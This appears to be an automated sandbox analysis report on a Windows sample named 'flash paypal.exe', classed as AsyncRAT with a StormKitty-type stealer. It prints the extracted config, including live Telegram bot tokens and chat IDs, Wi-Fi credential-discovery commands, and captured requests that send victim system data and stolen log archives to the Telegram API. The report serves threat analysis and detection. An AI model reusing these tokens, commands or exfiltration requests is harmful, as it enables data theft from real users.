Analysis

  • max time kernel
    111s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-08-2024 12:05

General

  • Target

    flash paypal.exe

  • Size

    175KB

  • MD5

    0d421a91631c3c2cae6533bd32e2e595

  • SHA1

    9113e54ec2b864a4845cb14930aa60666e1a596a

  • SHA256

    e1df166da9ba07ad1a5b1a105eac585f04ea67a023cca16f54bdbfa97bb39dd2

  • SHA512

    1d677726303cb667c01d8d340f5632667c1929dd5965e7008eab2d1755a02823cff1f583ece6987085ed1eb28429afa2592e5f0b6b63a3bb8e9c17d77c69d8ad

  • SSDEEP

    3072:Ue8oX8Sb5KcXrtkkXmf/bDsvqtU+lLToChAP0UZ0b2gTIwAqE+Wpor:9Xtb5KcXr7XmfgqtjhAxZ0b2h

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar profile contents.

  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\flash paypal.exe
    "C:\Users\Admin\AppData\Local\Temp\flash paypal.exe"
    1⤵
    • Drops desktop.ini file(s)
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Wi-Fi Discovery
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show profile
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1792
      • C:\Windows\SysWOW64\findstr.exe
        findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5000
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4556
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3056
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show networks mode=bssid
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1376

Network

  • US
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=3E38253D3E8366C61D1E31EE3F636711; domain=.bing.com; expires=Sun, 31-Aug-2025 12:05:32 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 101824CFA4664D1587A9C738291B0E1C Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:32Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3E38253D3E8366C61D1E31EE3F636711
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=53ETKp20L6LXwloaGkW2Q6InFDb4ZHkgrsOKo2ragys; domain=.bing.com; expires=Sun, 31-Aug-2025 12:05:33 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2EC3C9E8D60D43A7B73ACBCFDF24B338 Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:33Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3E38253D3E8366C61D1E31EE3F636711; MSPTC=53ETKp20L6LXwloaGkW2Q6InFDb4ZHkgrsOKo2ragys
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 943E47DE7F0748D1847EF97318C22F6E Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:33Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • US
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • US
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
  • US
    DNS
    237.21.107.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.21.107.13.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77.deploy.static.akamaitechnologies.com
  • US
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    icanhazip.com
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    icanhazip.com
    IN A
    Response
    icanhazip.com
    IN A
    104.16.185.241
    icanhazip.com
    IN A
    104.16.184.241
  • US
    GET
    http://icanhazip.com/
    flash paypal.exe
    Remote address:
    104.16.185.241:80
    Request
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 06 Aug 2024 12:05:46 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=x6_t2LFft3ez9L.NRojrNTBpbot35wDJfqAkgoc3p_g-1722945946-1.0.1.1-a5LIn.Z4Vi6D8XhSy5ouV6jtICoJ8H6ikH.G709jdsrHXrKJMjerMJEgfoKWDCjguKOK.LtkjtZIUFd46kl0Kg; path=/; expires=Tue, 06-Aug-24 12:35:46 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8aeee5a7afb593ee-LHR
    alt-svc: h3=":443"; ma=86400
  • US
    DNS
    api.mylnikov.org
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    api.mylnikov.org
    IN A
    Response
    api.mylnikov.org
    IN A
    172.67.196.114
    api.mylnikov.org
    IN A
    104.21.44.66
  • US
    GET
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f
    flash paypal.exe
    Remote address:
    172.67.196.114:443
    Request
    GET /geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f HTTP/1.1
    Host: api.mylnikov.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json; charset=utf8
    Content-Length: 88
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Cache-Control: max-age=2678400
    CF-Cache-Status: MISS
    Last-Modified: Tue, 06 Aug 2024 12:05:47 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QqC4EatN1cPxIuV5jOMi8I%2BB0XpCEDgycYllgY%2BPR2apFQQpTx69oZZ00dIRtAiJPUeYjTo%2B4Kp2XNK4Q8y%2FiRHapbVHd18Rw7E%2BTntmhb%2BUMotIVpPCeQFu5TZUaO%2F9ZJfg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8aeee5a9ff9c3d8e-LHR
    alt-svc: h3=":443"; ma=86400
  • US
    DNS
    api.telegram.org
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • NL
    GET
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json
    Content-Length: 137
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • NL
    GET
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json
    Content-Length: 252
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • US
    DNS
    241.185.16.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.185.16.104.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    114.196.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.196.67.172.in-addr.arpa
    IN PTR
    Response
  • NL
    POST
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421 HTTP/1.1
    Content-Type: multipart/form-data; boundary="9f979af1-0ea3-45af-8c11-f317451e37bd"
    Host: api.telegram.org
    Content-Length: 82941
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:48 GMT
    Content-Type: application/json
    Content-Length: 468
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • US
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • NL
    POST
    https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348 HTTP/1.1
    Content-Type: multipart/form-data; boundary="6c747961-d8b9-49f8-8467-dc7d04413380"
    Host: api.telegram.org
    Content-Length: 82941
    Expect: 100-continue
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:50 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • US
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73.deploy.static.akamaitechnologies.com
  • US
    DNS
    34.58.20.217.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    34.58.20.217.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 13.107.21.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    tls, http2
    2.0kB
    9.3kB
    21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204
  • 104.16.185.241:80
    http://icanhazip.com/
    http
    flash paypal.exe
    247 B
    668 B
    4
    3

    HTTP Request

    GET http://icanhazip.com/

    HTTP Response

    200
  • 172.67.196.114:443
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f
    tls, http
    flash paypal.exe
    722 B
    4.2kB
    7
    8

    HTTP Request

    GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    tls, http
    flash paypal.exe
    2.5kB
    7.5kB
    11
    13

    HTTP Request

    GET https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

    HTTP Response

    400

    HTTP Request

    GET https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421
    tls, http
    flash paypal.exe
    87.4kB
    9.0kB
    74
    55

    HTTP Request

    POST https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348
    tls, http
    flash paypal.exe
    106.5kB
    7.9kB
    97
    33

    HTTP Request

    POST https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348

    HTTP Response

    401
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    13.107.21.237
    204.79.197.237

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    132 B
    90 B
    2
    1

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    237.21.107.13.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    237.21.107.13.in-addr.arpa

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    icanhazip.com
    dns
    flash paypal.exe
    59 B
    91 B
    1
    1

    DNS Request

    icanhazip.com

    DNS Response

    104.16.185.241
    104.16.184.241

  • 8.8.8.8:53
    api.mylnikov.org
    dns
    flash paypal.exe
    62 B
    94 B
    1
    1

    DNS Request

    api.mylnikov.org

    DNS Response

    172.67.196.114
    104.21.44.66

  • 8.8.8.8:53
    api.telegram.org
    dns
    flash paypal.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    241.185.16.104.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    241.185.16.104.in-addr.arpa

  • 8.8.8.8:53
    114.196.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    114.196.67.172.in-addr.arpa

